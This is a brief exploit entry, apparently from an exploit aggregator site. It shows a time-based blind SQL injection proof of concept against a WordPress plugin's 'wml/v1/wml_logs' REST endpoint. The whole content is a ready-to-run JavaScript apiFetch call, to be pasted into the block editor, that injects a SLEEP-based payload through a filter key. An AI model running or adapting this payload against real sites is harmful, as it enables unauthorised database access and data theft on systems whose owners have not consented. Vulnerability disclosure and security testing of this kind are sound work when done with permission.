Share
## https://sploitus.com/exploit?id=WPEX-ID:E392FB53-66E9-4C43-9E4F-F4EA7C561551
Run the following within a block editor page. Notice that the request is delayed by the SLEEP call in the injected SQL.

await wp.apiFetch({path: 'wml/v1/wml_logs', method: 'POST', data: {pageSize: 10, filter: {1: {key: '1=(SELECT IF(1=1,SLEEP(10),\'a\')))#', operator: '', value: ''}}}});